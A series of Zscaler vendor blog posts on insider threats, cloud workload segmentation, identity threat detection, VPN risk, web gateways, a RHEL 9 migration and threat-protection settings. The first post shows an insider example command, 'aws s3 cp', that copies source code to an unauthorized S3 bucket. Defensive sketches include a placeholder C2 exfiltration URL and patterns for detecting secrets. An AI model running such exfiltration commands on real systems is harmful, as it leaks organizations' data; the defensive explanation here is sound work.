Betrayal in the Cloud: Unmasking Insider Threats and Halting Data Exfiltration from Public Cloud Workloads

Introduction

In today’s digital world, safeguarding sensitive data, such as source code, is crucial. Insider threats are a formidable adversary, posing significant risk, especially when trusted employees have access to valuable repositories. This article explores how a fictitious software development company could use Zscaler security solutions to stop insider attempts to upload source code. By using Zscaler Workload Communications, the fictitious company detects and prevents unauthorized uploads, ensuring the security of its intellectual property.

Insider Threats in the Cloud and How to Stop Them

A fictitious software development company relies on its source code repository as the lifeblood of its operations. Trusted employees have access to this repository to facilitate collaboration and innovation. To mitigate the risk of insider threats, the fictitious company implements Zscaler security solutions. Let’s explore how our products thwart an insider’s attempt to upload source code to an unauthorized destination.

Attack Chain Use Case Steps

Trusted employee access: A trusted employee (insider) has access to the source code repository, enabling them to complete their job responsibilities. A simplified example of source code is shown below:

Insider threat incident: The trusted employee with legitimate access decides to misuse their privileges by attempting to upload source code files to an unauthorized destination, an AWS S3 bucket, intending to share them without authorization.
user:~$ aws s3 cp sourcecode.c s3://bucket/uploads/sourcecode.c

Figure 1: This diagram depicts how Zscaler blocks insider threats

Integration with Zscaler Workload Communications: The fictitious company’s source code repository is configured to route all outbound traffic through Zscaler Workload Communications, ensuring that data transmissions undergo rigorous inspection and security policies are enforced.

ZIA DLP engine implementation: ZIA leverages its powerful inline data loss prevention (DLP) engine to analyze data traffic in real time. ZIA’s DLP policies are designed to identify and prevent unauthorized attempts to upload source code files to external storage spaces. An example of DLP configuration options is shown below.

Figure 2: An example of DLP configuration options

Detection and prevention of file upload attempts: As an insider attempts to upload source code files to the unauthorized AWS S3 bucket, ZIA’s DLP engine detects the transfer as a violation of security policies. Leveraging advanced pattern recognition and behavior analysis, ZIA blocks the upload attempt in real time, preventing the exfiltration of company data. The figure below shows the source code file upload attempt failing in real time.

Figure 3: The source code file upload command receives an error when executed

The upload attempt, which violated company policy, appears in descriptive log records, as shown below.

Figure 4: A log showing the failed source code file upload, along with important details like user, location, and destination

Alerting and response: The Zscaler security platform generates immediate alerts upon detecting the unauthorized upload attempt.
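Inline DLP engines of this kind match outbound payloads against content dictionaries and patterns before the data leaves the environment. The sketch below is a loose illustration of that idea only, not ZIA’s actual engine: a handful of hypothetical regex signatures that flag a payload as likely source code.

```python
import re

# Illustrative patterns only -- a real DLP engine uses far richer
# dictionaries, exact-data matching, and ML classifiers.
SOURCE_CODE_PATTERNS = [
    re.compile(r"#include\s*<\w+\.h>"),   # C/C++ include directives
    re.compile(r"\bint\s+main\s*\("),     # C-style entry point
    re.compile(r"\bdef\s+\w+\s*\("),      # Python function definition
    re.compile(r"\bclass\s+\w+"),         # class declarations
]

def looks_like_source_code(payload: str, threshold: int = 2) -> bool:
    """Flag an outbound payload when enough code patterns match."""
    hits = sum(1 for p in SOURCE_CODE_PATTERNS if p.search(payload))
    return hits >= threshold

payload = "#include <stdio.h>\nint main(void) { return 0; }"
if looks_like_source_code(payload):
    print("BLOCK: possible source code exfiltration")
```

A payload matching two or more signatures would be blocked; ordinary business text matches none and passes.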
How Zscaler Can Help

Zscaler’s security products offer effective solutions against insider threats aimed at source code repositories:

Outbound Data Violation Trigger
By routing through Zscaler’s Cloud Connector, organizations can enforce security policies on all outbound data transmissions, including those from source code repositories. This integration ensures that every upload attempt undergoes security checks, regardless of the destination.

Data Breach Prevention
Zscaler Internet Access (ZIA) features a powerful data loss prevention (DLP) engine that analyzes data in real time. Leveraging advanced DLP policies, ZIA can detect patterns indicative of unauthorized source code uploads. This approach enables organizations to prevent data breaches before they occur.

Instant Alerts
The Zscaler platform provides real-time monitoring of all network activity, including access to source code repositories. Any suspicious behavior, such as attempts to upload source code to unauthorized destinations, triggers immediate alerts. This allows security teams to respond promptly and prevent potential data exfiltration.

Conclusion

With cybersecurity threats on the rise, organizations must combat insider risks effectively. Zscaler solutions offer proactive measures against insider threats, as demonstrated by the hypothetical use case outlined above. By implementing robust DLP policies and real-time monitoring, organizations can protect their critical data from unauthorized access and maintain data integrity. The Zscaler platform equips organizations to tackle insider threats confidently, securing their digital assets effectively.

Tue, 02 Apr 2024 13:31:17 -0700 Sakthi Chandra

Exposing the Dark Side of Public Clouds - Combating Malicious Attacks on Workloads

Introduction

This article compares the cybersecurity strategies of a company that does not use Zscaler solutions with one that has implemented Zscaler's offerings.
By exploring two different scenarios, we will highlight the advantages of Zscaler zero trust for workload communications and its specific use of data loss prevention.

Threat Propagation Without Zscaler Integration

Lateral Movement Between Workloads

In the following scenario, you’ll see that without Zscaler’s integration, the organization is unable to detect or prevent threats effectively. This allows attackers to move laterally and exfiltrate data undetected, leading to significant security risks.

Workload 1 in Azure West sends an HTTP GET request to GitHub for a patch update: Workload 1, deployed in Azure West, initiates an outbound connection to GitHub to fetch a required patch update. This HTTP GET request is sent to GitHub to download the patch:

An HTTP response containing malware from GitHub: Unbeknownst to the organization, the HTTP response received from GitHub contains embedded malware.

Attacker’s lateral movement to Workload 2: By exploiting the malware present in the HTTP response, an attacker gains access to Workload 1 and subsequently moves laterally to Workload 2 within the Azure West environment. From here, the attacker exploits vulnerabilities or misconfigurations in Workload 2 to gain a network foothold and establish persistence, furthering their malicious objectives.

Data exfiltration to a command-and-control (C2) server: With access to Workload 2, the attacker exfiltrates sensitive data from the organization’s environment to a remote C2 server.

Threat Containment with Zscaler Integration

In the following scenario, Zscaler’s integrated security platform provides comprehensive protection against various stages of the attack life cycle.
Organizations can use Zscaler Internet Access (ZIA), coupled with Zscaler Data Loss Prevention (DLP) and Zscaler Workload Communications, to implement:

- Strict access controls
- Malware detection and prevention measures
- Workload segmentation

Enhanced outbound security measures to GitHub (internet): With Zscaler integrated into the organization’s infrastructure, outbound traffic from Workload 1 to GitHub is subjected to stringent access control policies. Only approved URIs are permitted, which ensures communications are limited to trusted destinations. Any attempt to access unauthorized URIs is blocked.

Malware detection and prevention: Zscaler’s security layers, including content inspection and advanced cloud sandbox features, intercept and inspect the HTTP response from GitHub in real time. Upon detecting malware, Zscaler halts transmission, preventing Workload 1 from being compromised.

Workload segmentation to prevent lateral movement: Zscaler enforces strict segmentation policies, ensuring that Workload 1 and Workload 2, which are deployed across two different regions, are treated as private applications with no direct communication allowed between them. Such segmentation effectively isolates these workloads, preventing any lateral threat movement between them.

Egress traffic security from Workload 2 with advanced data protection: Egress traffic from Workload 2 is safeguarded using ZIA’s advanced protection capabilities. Zscaler ensures that sensitive data is not exfiltrated from the organization's environment. By enforcing DLP policies, Zscaler prevents unauthorized data transfers.

Conclusion

The deployment of Zscaler’s solutions significantly enhances the organization’s ability to combat cyberthreats and safeguard public cloud workloads. Without Zscaler, companies face unmonitored outbound traffic, susceptibility to malware infiltration, and the risk of lateral movement and data exfiltration.
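To recap the egress controls in the protected scenario: the “approved URIs only” policy reduces, conceptually, to an allowlist check on every outbound destination. The sketch below is illustrative only; the host names are hypothetical examples, and real enforcement happens inline in the Zscaler cloud rather than in workload code.

```python
from urllib.parse import urlparse

# Hypothetical allowlist -- in practice this is policy configured in ZIA.
APPROVED_HOSTS = {"github.com", "objects.githubusercontent.com"}

def egress_allowed(url: str) -> bool:
    """Permit outbound requests only to explicitly approved hosts."""
    host = urlparse(url).hostname or ""
    return host.lower() in APPROVED_HOSTS

print(egress_allowed("https://github.com/org/repo/patch.tar.gz"))  # True
print(egress_allowed("https://attacker-c2.example.net/exfil"))     # False
```

The legitimate patch fetch succeeds, while the attempted connection to an unapproved C2 host is denied.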
With Zscaler zero trust for workloads, organizations enjoy comprehensive protection, including access control policies, malware detection and prevention, segmentation to prevent lateral movement, and advanced data protection measures. Implementing Zscaler solutions enables organizations to bolster their cybersecurity defenses, mitigate risks, and protect their intellectual property from evolving threats in an interconnected digital environment.

Tue, 02 Apr 2024 19:14:07 -0700 Sakthi Chandra

Protecting Identity Becomes Pivotal in Stopping Cyberattacks

As today’s workplace transforms, data is no longer centralized and is spread across clouds, increasing the attack surface. Attackers are constantly looking for vulnerabilities to exploit and searching for the Achilles heel in identity systems that could grant them entry into your IT environment. Cyber actors are now using sophisticated methods to target identity and access management infrastructure. Credential misuse is the most common attack method. According to Gartner, “Modern attacks have shown that identity hygiene is not enough to prevent breaches. Multifactor authentication and entitlement management can be circumvented, and they lack mechanisms for detection and response if something goes wrong.” Prioritize securing identity infrastructure with tools to monitor identity attack techniques, protect identity and access controls, detect when attacks are occurring, and enable fast remediation.

Zscaler ITDR detects credential theft and privilege misuse, attacks on Active Directory, and risky entitlements that create attack paths

With identity-based attacks on the rise, today’s businesses require the ability to detect when attackers exploit, misuse, or steal enterprise identities. Identifying and detecting identity-based threats is now crucial due to attackers' propensity for using credentials and Active Directory (AD) exploitation techniques for privilege escalation and lateral movement across your environment.
Zscaler ITDR helps you thwart identity-based AD attacks in real time and gain actionable insight into gaps in your identity attack surface. The solution continuously monitors identities, provides visibility into misconfigurations and risky permissions, and detects identity-based attacks such as credential theft, multifactor authentication bypass, and privilege escalation.

Gain Full Visibility

Uncover blind spots and hidden vulnerabilities that leave your environment susceptible to identity-based attacks, such as exposed surfaces, dormant credentials, and policy violations.

Real-Time Identity Threat Detection and Response

Zscaler Identity Protection uses identity threat detections and decoys that raise high-fidelity alerts, helping your security teams swiftly remediate with a targeted response. The same endpoint agent that runs deception also detects identity attacks on the endpoint. These include advanced attacks like DCSync, DCShadow, LDAP enumeration, session enumeration, Kerberoast attacks, and more.

Reduce Identity Risk

With deep visibility into identity context, Zscaler Identity Protection helps your security teams identify, address, and purge compromised systems and exposed credentials quickly. Often, security teams struggle to collect context and correlations to investigate threats. Zscaler ITDR solves this problem by consolidating all risk signals, threats detected, failed posture checks, Okta metadata, and policy blocks (ZIA/ZPA) into a single view for each identity. You can now quickly investigate risky identities for indicators of compromise and potential exploitation.

Prevent Credential Misuse/Theft

Attackers use stolen credentials and attack Active Directory to escalate privileges and move laterally. Zscaler Identity Protection helps detect credential exploits and prevent credential theft or misuse.
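Exposed credentials are usually found by scanning endpoint artifacts for secret-shaped content. As a toy illustration of that idea only (these signatures are simplified assumptions, not Zscaler ITDR’s scanner, which also covers the registry, memory, browser stores, and credential managers):

```python
import re

# Toy signatures for exposed secrets; illustrative only.
SECRET_PATTERNS = {
    "private_key": re.compile(r"-----BEGIN (?:RSA |EC )?PRIVATE KEY-----"),
    "password_assignment": re.compile(r"(?i)password\s*[:=]\s*\S+"),
    "aws_access_key": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
}

def scan_for_secrets(text: str) -> list:
    """Return the names of secret patterns found in a blob of text."""
    return [name for name, pat in SECRET_PATTERNS.items() if pat.search(text)]

config = "db_host=10.0.0.5\npassword = hunter2\n"
print(scan_for_secrets(config))  # ['password_assignment']
```

Running such checks across files and configuration surfaces the credential sprawl that gives attackers lateral movement paths.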
Spot Lateral Movement

Stop attackers who have gotten past perimeter-based defenses and are attempting to move laterally through your environment. Zscaler ITDR enhances security by identifying misconfigurations and credential exposures that create attack paths attackers can use for lateral movement.

Zscaler ITDR: Beyond just prevention – Monitor, detect, & respond to identity threats

Monitor: Identity systems are in constant flux with configuration and permission changes. Get alerts when configuration changes introduce new risks. Organizations lack visibility into credential sprawl across their endpoint footprint, leaving them vulnerable to attackers who exploit these credentials to access sensitive data and apps. Zscaler ITDR audits all endpoints to identify credentials and other sensitive material in sources such as files, the registry, memory, caches, configuration files, credential managers, and browsers. This visibility into endpoint credential exposure helps identify lateral movement paths, enforce policies, and clean up credentials to reduce the internal attack surface.

Detect: ITDR automatically surfaces hidden risks that might otherwise slip through the cracks. Zscaler ITDR pulls together all risk signals, threats detected, posture checks failed, metadata from Okta, and policy blocks from ZIA/ZPA into a single unified view to provide a complete picture of risk for an identity. This helps detect unmanaged identities, misconfigured settings, and even credential misuse.

Respond: When ITDR spots attacks targeting your identity store, you can take immediate action. Restrict or terminate the offending identities and shut down threats before they have a chance to wreak havoc.

Zscaler ITDR Benefits

Minimize the Attack Surface

Reduce your attack surface by gaining continuous visibility into attack vectors and identity misconfigurations.
Stop adversarial advances—including ransomware attacks—in their tracks with traps set for attackers.

Real-Time Identity Threat Detection

Thwart sophisticated attacks on Active Directory using identity threat detections on endpoints.

Accelerate Incident Response

Built-in threat detection and response speeds up detection, expands coverage, and significantly reduces mean time to respond (MTTR). ITDR also helps security teams prioritize what matters most through risk scoring.

Conclusion

Breaches are inevitable, and preventative security measures alone aren’t sufficient to thwart them. Though staying upbeat while fighting cyberthreats, shrinking budgets, and staff turnover is a tall task, how we respond today dictates how we perform tomorrow. Choosing and adopting identity protection solutions like ITDR helps your company evolve its zero trust security and compliance posture in response to the changing threat landscape. Zscaler ITDR strengthens your zero trust posture by mitigating the risks of user compromise and privilege exploitation.

Fri, 22 Mar 2024 02:39:16 -0700 Nagesh Swamy

Eliminate Risky Attack Surfaces

Many moons ago, when the world wide web was young and the nerd in me was strong, I remember building a PC and setting it up as a web server. In those exciting, pioneering days, it was quite something to have my very own IP address on the internet and serve my own web pages directly from my Apache server to the world. Great fun. I also remember looking at the server logs in horror as I scrolled through pages upon pages of failed login, and presumably hacking, attempts. I’d buttoned things up pretty nicely from a security standpoint, but even so, it would only have taken a vulnerability in an unpatched piece of software for a breach to occur, and from there, all bets would have been off. Even today, many internet service providers will let you provision your own server, should you feel brave enough.
Of course, the stakes were not high for me at home, but knowing what we know now about the growth of ransomware attacks and how AI is facilitating them, no organization would dare do such a thing in 2024. Back then, I’d created an obvious and open attack surface. Tools were (and still are) readily available to scan IP address ranges on any network and identify open ports. In my case, ports 22, 80, and 443 were open to serve web pages and enable me to administer my server remotely. Every open port is a potential conduit into the heart of the hosting device, so open ports should be eliminated wherever possible.

Open ports, VPNs, and business

Since online remote working became a real possibility in the early 2000s, organizations have tried to protect themselves and their employees by adopting VPN technology to encrypt traffic between a remote device and a VPN concentrator at the head office, allowing employees access to services like email and file and print servers. Even when these services became cloud-based solutions like Gmail and Dropbox, many organizations pulled that traffic across a VPN to apply IT access policies. Not only did this often lead to an inefficient path from a remote worker to their applications, it also presented a serious security risk. As the performance and dependability of the internet grew, we also saw the advent of site-to-site VPNs, which made for an attractive alternative to the far more expensive circuit-based connections, such as MPLS, that had been so prevalent. A vast number of organizations continue to rely on a virtual wide area network (WAN) built on top of VPNs. Unfortunately, as the old saying goes, there’s no such thing as a free lunch. Every VPN client or site using the internet as its backbone needs an IP address to connect to, an open port to connect through, and, well, you can see where this is going. Not every VPN solution has an active flaw, just as—luckily—my Apache server didn’t at the time I was running it.
That said, software is fallible, and history has demonstrated this fact in numerous instances in which vulnerabilities were discovered and exploited in VPN products. Just last month, a critical flaw was discovered in Ivanti’s VPN services, leaving thousands of users and organizations open to attack. Hackers are scouring the internet day and night for vulnerabilities like these to exploit, and AI is only making their lives easier.

“Without proper configuration, patch management, and hardening, VPNs are vulnerable to attack.” from Securing IPsec Virtual Private Networks by the National Security Agency (NSA)

Zscaler is different

The Zscaler Zero Trust Exchange™ works in a fundamentally different way: no VPN is required to connect securely. Instead, connections via the internet (or even from within a managed network) are policed on multiple levels. An agent on your device creates a TLS tunnel to the Zscaler cloud, which accepts connections only from known tenants (i.e., Zscaler customers). This tunnel is mutually authenticated and encrypted between the agent and the Zscaler cloud. The individual and their device(s) must additionally be identified as part of the process. In short, it’s not possible to simply make a TLS connection to Zscaler. Once an approved user from a known customer with a recognized device connects to Zscaler, they’re still prevented from moving laterally over the network, as would be possible with a VPN. With Zscaler, there is no IP range to which the user has access. Instead, every connection attempt has to be authorized, following the principles of zero trust. A user has access only to the applications for which they’ve been authorized. With this framework, even if an organization were successfully attacked, the blast radius would be limited. The same cannot be said for network-based security.
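Conceptually, a mutually authenticated tunnel of the kind described is a TLS client that both verifies the service and presents its own certificate. The Python sketch below illustrates that general pattern only; it is not Zscaler’s implementation, and the certificate file names are placeholders.

```python
import ssl

def make_mtls_context(ca_file=None, cert_file=None, key_file=None):
    """Build a TLS client context that verifies the server and, when a
    client certificate is supplied, can authenticate the client as well."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)  # server verification on by default
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    if ca_file:
        ctx.load_verify_locations(ca_file)        # trust only the service's CA
    else:
        ctx.load_default_certs()
    if cert_file:
        ctx.load_cert_chain(cert_file, key_file)  # present client-side identity
    return ctx

# Usage (paths are placeholders):
# ctx = make_mtls_context("ca.pem", "client.pem", "client.key")
# with socket.create_connection((host, 443)) as s:
#     tls = ctx.wrap_socket(s, server_hostname=host)
```

The key point is that both sides must prove their identity before any application traffic flows, which is what makes an anonymous “just connect to the open port” probe impossible.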
Here’s the bottom line: VPNs and the firewalls behind them served us well for a long time, but the challenges of maintaining a security posture built on these legacy technologies are so great that it’s now a material business risk to use them. You need only turn on the news for a few minutes to be reminded of this. Networks were built fundamentally to enable connectivity, and adding security to them is an uphill battle of putting the right obstacles in the way of that connectivity. This is why more and more public bodies and private organizations are turning this idea on its head and embracing a zero trust architecture that provides access only for an approved entity, on an approved device, to the applications to which they are entitled. At Zscaler, we have built tools to help you assess the potential risk your own organization faces, some of which are free to access. Test your own defenses, and when you’re ready to learn more, get in touch!

Tue, 02 Apr 2024 01:00:01 -0700 Simon Tompson

Break Free from Appliance-Based Secure Web Gateway (SWG)

The way we work today is vastly different from a few years ago. McKinsey & Company’s State of Organization 2023 report identified that before the COVID-19 pandemic, most organizations expected employees to spend more than 80% of their time in-office. But as of 2023, says the report, 90% of employees have embraced hybrid models, allowing them to work from home or other locations some (if not most) of the time. On a similar note, applications previously hosted in on-premises data centers are increasingly moving to the cloud. Gartner predicted that SaaS application spending would grow 17.9% to total $197 billion in 2023. With employees and apps both migrating off-premises, security controls logically must do the same.
It’s no exaggeration to state that cloud and mobility have broken the legacy way of approaching security—so why should the castle-and-moat security approach, heavily reliant on hardware such as appliance-based proxies/SWGs, still exist? Users need fast, reliable, secure connectivity to the internet and cloud apps, with the flexibility to connect and work from anywhere. However, traditional SWGs have certain limitations, leading to security challenges, poor user experience, constant maintenance, and scalability issues. Let’s take a look at why it’s time to break free from appliance-based SWG.

Security challenges

In December 2013, the Google Transparency Report showed just 48% of World Wide Web traffic was encrypted. Today, the same report shows at least 95% of traffic is encrypted. So, it’s no surprise that the Zscaler ThreatLabz 2023 State of Encrypted Attacks report showed 85.9% of threats—malware payloads, phishing scams, ad spyware sites, sensitive data leaks, and more—are now delivered over encrypted channels. While most organizations have some form of protection against malware, attackers are evolving their techniques, creating new variants able to bypass reputation-based detection technologies. As threat actors increasingly rely on encrypted channels, it’s more crucial than ever to inspect 100% of TLS/SSL traffic. This is the biggest way appliance-based proxies weigh down organizations: most SWG appliances lack the capacity to perform 100% inspection. Our 2023 State of Encrypted Attacks report surveyed 284 IT, security, and networking professionals and found that they mainly use legacy tools like web application firewalls and network-layer firewalls to scan traffic. However, respondents agreed that complexity, cost, and performance degradation are the biggest barriers to inspecting all TLS/SSL traffic. Furthermore, certain regulations require different policies for distinct data types, making inspection an arduous task.
Poor user experience

Compared to only a few years ago, the meaning of “fast” is very different for today’s internet users. Instant access and connectivity have become the norm at home. Employees juxtapose the great digital experiences in their personal lives with the poor connectivity and performance issues that plague their digital work lives. Appliance-based SWGs are among the main culprits of poor user experience because they can’t scale quickly to handle traffic surges, and they require traffic to be backhauled to a central data center, leading to high latency and lost productivity for users trying to access the internet or SaaS applications. And all this inevitably affects revenue.

Maintenance and scalability issues

Apart from complexity and tedious management, other challenges of appliance-based SWGs are maintenance and scalability. To account for traffic surges and future growth, security teams are forced to overprovision, leading to expensive appliances sitting unused. At other times, they may need to wait months for appliances or upgrades to arrive. With appliance-based SWG, security teams are always spread too thin, having to constantly update SWGs to account for changes to the organization and the threat landscape.

The Zscaler difference

Overcome the limitations of appliance-based SWG with Zscaler.

Better security: Inspect 100% of TLS/SSL traffic to find and stop threats—86% of which are delivered over encrypted channels.

Better user experience: Stop backhauling internet/SaaS traffic with AI-powered Zscaler SWG, delivered from 150+ points of presence worldwide, close to your users and their cloud destinations, for lower latency.

No hardware to maintain: Move to a cloud native proxy architecture and eliminate the hardware headaches of maintenance, updates, patches, and upgrades.
Platform approach: Extend comprehensive security functions, such as cloud firewall, sandbox, CASB, and data loss prevention, as well as end-to-end experience monitoring, from a single unified platform and agent.

If you’d like to know more about the reasons to break free from appliance-based proxies, check out this on-demand webinar.

Wed, 20 Mar 2024 07:04:23 -0700 Apoorva Ravikrishnan

Zscaler Selects Red Hat Enterprise Linux 9 (RHEL 9) as Next-Gen Private Access Operating System

What’s new?

On June 30, CentOS 7 will reach end of life, requiring migrations in many software stacks and server environments. In advance of this, Zscaler has selected Red Hat Enterprise Linux 9 as the next-generation operating system for Zscaler Private Access™ (ZPA). RHEL 9 is the modern enterprise equivalent to CentOS 7, backed by Red Hat, and supported through 2032. This continues ZPA’s proven stability and resiliency on open source Linux platforms and builds on 10 years of maturity on Red Hat Enterprise Linux-based derivatives. What’s more, this transition can be done with no impact to operations or user access.

When will it be released?

Pre-built images for all ZPA-supported platforms are targeted for release in May 2024. All ZPA images, including containers, hypervisors, and public cloud offerings, will be replaced with RHEL 9. This is the recommended deployment for all future App Connector and Private Service Edge components, and customers should begin migration immediately upon release. For customers that manage their own Red Hat base images, Zscaler is targeting the end of April 2024 for release of RHEL 9-native Red Hat Package Manager (RPM) packages and repositories.

New Enterprise OS Without Licensing Fees

To ensure an excellent experience for our customers, Zscaler will provide operating system licenses for all RHEL 9 images on supported platforms. This continues our commitment to secure, open source platforms without imposing additional licensing costs on our customers.
We also understand the need for control over security baseline images that meet your security posture and will continue to provide RPM options through support of RHEL 8 and RHEL 9. These software packages are bring-your-own-license (BYOL) and won’t conflict with any existing Red Hat enterprise license agreements you may hold.

CentOS 7 End of Life

The CentOS Project and Red Hat will be ending final extended support for CentOS 7 and RHEL 7 on June 30, 2024. While we aim to provide RHEL 9 support in advance of this date (and do currently support RHEL 8 with RPMs), we recognize that the transition is a large undertaking, affecting all enterprise data centers and operations, and that moving to new operating systems and software will take time. In light of this, we want to provide ample time to migrate while considering the security implications of continuing to support an obsolete operating system. Zscaler will support existing CentOS 7 deployments, RPMs, and distribution servers until December 24, 2024. We are confident our ZPA architecture and design uniquely position us to continue to support CentOS 7 past its expiry date. See End-of-Support for CentOS 7.x, RHEL 7.x, and Oracle Linux 7.x for more details on CentOS EOL, and the ZPA white paper for architecture and security design. While we have ample controls in place and the utmost confidence, there is always inherent risk in using an unsupported server operating system. Zscaler will not provide backported operating system patches during this transition, but will maintain the ZPA software and supporting security libraries.

Lightweight and Container Orchestration Ready

Following Zscaler’s cloud native, best-in-class zero trust approach, ZPA infrastructure components are designed to be lightweight, container ready, and quickly deployed. This allows App Connector and Private Service Edge to be scaled and migrated without concern for previously deployed instances or operating system upgrade paths.
For these reasons, the migration best practice is to deploy new App Connectors and Private Service Edges. Zscaler does not provide direct operating system upgrade paths for currently deployed infrastructure components. In further support of this, we offer Open Container Initiative (OCI) compatible images for Docker CE, Podman, and Red Hat OpenShift Platform. These images, as well as the public cloud marketplace offerings, are fully ready for autoscale groups, supporting quick scale-up and scale-down.

Migration and Support Excellence

Zscaler understands your concerns and will fully support you throughout this transition process. Our Technical Account Managers, Support Engineers, and Professional Services are ready to address all concerns related to migration. If a temporary increase of App Connector or PSE limits is needed in your environment to complete migration, there will be no extra licensing costs. Below are the steps to help you replace CentOS 7 instances with RHEL 9. The enrollment and provisioning of new App Connectors and Private Service Edges can be automated in a few steps using Terraform (infrastructure as code) or container orchestration to simplify deployment further.

App Connector Migration Steps:

Create new App Connector Groups and provisioning keys for each location (Note: do not reuse existing provisioning keys, as this will add the new RHEL 9 App Connectors to the old App Connector Groups. Mixing different host OS and Zscaler software versions in a single group is not supported.)
Update the App Connector Group's version profile to "default - el9" so that it's able to receive the proper binary updates (This version profile can be set as the default for the tenant once all connectors are moved to RHEL 9)

Deploy new VMs using the upcoming RHEL 9 OVAs and newly created provisioning keys (templates can be used)

Add the new App Connector Groups to each respective Server Group

(Optional) In the UI, disable the App Connector Groups five minutes prior to the regional off-hours maintenance window to allow connections to gradually drain down

During regional off-hours, remove the CentOS 7 App Connector Groups

Private Service Edge Migration Steps:

Create new Service Edge Groups and provisioning keys for each location (Note: do not reuse existing provisioning keys, as this will add the new RHEL 9 PSEs to the old Service Edge Groups. Mixing different host OS and Zscaler software versions in a single group is not supported.)

Update the Service Edge Group's version profile to "Default - el9" so that it's able to receive the proper binary updates (This version profile can be set as the default for the tenant once all connectors and PSEs are moved to RHEL 9)

Deploy new VMs using the upcoming RHEL 9 OVAs and the newly created provisioning keys (templates can be used)

Add trusted networks and enable “publicly accessible” (if applicable) on the new Service Edge Groups

(Optional) In the UI, disable the Service Edge Groups 15 minutes prior to the regional off-hours maintenance window to allow connections to gradually drain down

During regional off-hours, remove trusted networks and disable public access (if applicable) on CentOS 7 Service Edge Groups

Please reach out to your respective support representatives for further assistance and information as needed.
For more information:
- Zscaler Private Access Website
- Zscaler Private Access | Zero Trust Network Access (ZTNA)
- End-of-Support for CentOS 7.x, RHEL 7.x, and Oracle Linux 7.x
- ZPA App Connector Software by Platform
- ZPA Private Service Edge Software by Platform

Mon, 18 Mar 2024 15:34:32 -0700 Shefali Chinni

Outpace Attackers with AI-Powered Advanced Threat Protection

Securing access to the internet and applications for any user, device, or workload connecting from anywhere in the world means preventing attacks before they start. Zscaler Advanced Threat Protection (ATP) is a suite of AI-powered cyberthreat and data protection services included with all editions of Zscaler Internet Access (ZIA) that provides always-on defense against complex cyberattacks, including malware, phishing campaigns, and more. Leveraging real-time AI risk assessments informed by threat intelligence that Zscaler harvests from more than 500 trillion daily signals, ATP stops advanced phishing, command-and-control (C2) attacks, and other tactics before they can impact your organization. In aggregate, Zscaler operates the largest global security cloud across 150 data centers and blocks more than 9 billion threats per day. Additionally, our platform consumes more than 40 industry threat intelligence feeds for further analysis and threat prevention.

With ATP you can:
- Allow, block, isolate, or alert on web pages based on AI-determined risk scores
- Block malicious content, files, botnet, and C2 traffic
- Stop phishing, spyware, cryptomining, adware, and webspam
- Prevent data loss via IRC or SSH tunneling and C2 traffic
- Block cross-site scripting (XSS) and P2P communications to prevent malicious code injection and file downloads

To provide this protection, Zscaler inspects traffic—encrypted or unencrypted—to block attackers’ attempts to compromise your organization.
Zscaler ThreatLabz found in 2023 that 86% of threats are now delivered over encrypted channels, underscoring the need to thoroughly inspect all traffic. Enabling protection against these threats takes just a few minutes in the ATP section of the Zscaler Internet Access management console. This blog will help you better understand the attack tactics ATP prevents on a continuous basis. We recommend you select "Block" for all policy options and set the "Suspicious Content Protection" risk tolerance setting to "Low" in the ATP configuration panel of the ZIA management console.

Prevent web content from compromising your environment

Threat actors routinely embed malicious scripts and applications on legitimate websites they’ve hacked. ATP policy protects your traffic from fraud, unauthorized communication, and other malicious objects and scripts. To bolster your organization's web security, the Zscaler ATP service identifies these objects and prevents them from downloading unwanted files or scripts onto an endpoint device via the user’s browser. Using multidimensional machine learning models, the ZIA service applies inline AI analysis to examine both a web page’s URL and its domain to create Page Risk and Domain Risk scores. Given the magnitude of Zscaler’s dataset and threat intelligence inputs, risk scoring is not dependent on specific indicators of compromise (IOCs) or patterns. Using AI/ML to analyze web pages reveals malicious content including injected scripts, vulnerable ActiveX, and zero-pixel iFrames. The Domain Risk score results from analysis of a domain’s contextual data, including hosting country, domain age, and links to high-risk top-level domains. The Page Risk and Domain Risk scores are then combined to produce a single Page Risk score in real time, which is displayed on a sliding scale. This risk score is then evaluated against the Page Risk value you set in the ATP configuration setting (as shown below).
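Mechanically, the evaluation just described is a threshold check over a combined score. Zscaler’s actual scoring models are proprietary; the sketch below only illustrates the mechanics, and the 0–100 scale, the weighting, and the function names are assumptions for illustration.

```python
# Illustrative only: Zscaler's real Page Risk model is proprietary.
# Assumed: per-page and per-domain scores on a 0-100 scale, blended with a
# simple fixed weighting, then compared against the admin-set tolerance.

def combined_page_risk(page_score: float, domain_score: float,
                       page_weight: float = 0.6) -> float:
    """Blend per-page and per-domain risk into one 0-100 score."""
    return page_weight * page_score + (1 - page_weight) * domain_score

def verdict(page_score: float, domain_score: float, tolerance: float) -> str:
    """Block any page whose combined risk exceeds the configured tolerance."""
    risk = combined_page_risk(page_score, domain_score)
    return "block" if risk > tolerance else "allow"

print(verdict(90, 80, tolerance=50))   # high-risk page and domain
print(verdict(10, 20, tolerance=50))   # low-risk page and domain
```

Lowering the tolerance value corresponds to a stricter policy: more pages fall above the threshold and are blocked.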
Zscaler will block users from accessing any web page with a Page Risk score higher than the value you set. You can set the Page Risk value based on your organization’s risk tolerance.

Disrupt automated botnet communication

A botnet is a group of internet-connected devices, each running one or more bots (small programs), collectively used to disrupt services via distributed denial-of-service (DDoS) attacks, steal financial or sensitive information, run spam campaigns, or brute-force systems. The threat actor controls the botnet using command-and-control software.

Command & Control Servers
An attacker uses a C2 server to send instructions to systems compromised by malware and retrieve stolen data from victim devices. Enabling this ATP policy blocks communication to known C2 servers, which is key to preventing attackers from communicating with malicious software deployed on victims’ devices.

Command & Control Traffic
This refers to botnet traffic that sends or receives commands to and from unknown servers. The Zscaler service examines the content of requests and responses to unknown servers. Enabling this control in the ATP configuration blocks this traffic.

Block malicious downloads and browser exploits

Malicious Content & Sites
Websites that attempt to download dangerous content to the user's browser upon loading a page introduce considerable risk: this content can be downloaded silently, without the user's knowledge or awareness. Malicious content can include exploit kits, compromised websites, and malicious advertising.

Vulnerable ActiveX Controls
An ActiveX control is a software program for Internet Explorer, often referred to as an add-on, that performs specific functionality after a web page loads. Threat actors can use ActiveX controls to masquerade as legitimate software when, in reality, they use them to infiltrate an organization’s environment.
Browser Exploits
Known web browser vulnerabilities can be exploited, including exploits targeting Internet Explorer and Adobe Flash. Despite Adobe sunsetting the browser-based add-on in January 2021, Flash components are still found embedded in systems, some of which may be critical for infrastructure or data center operations.

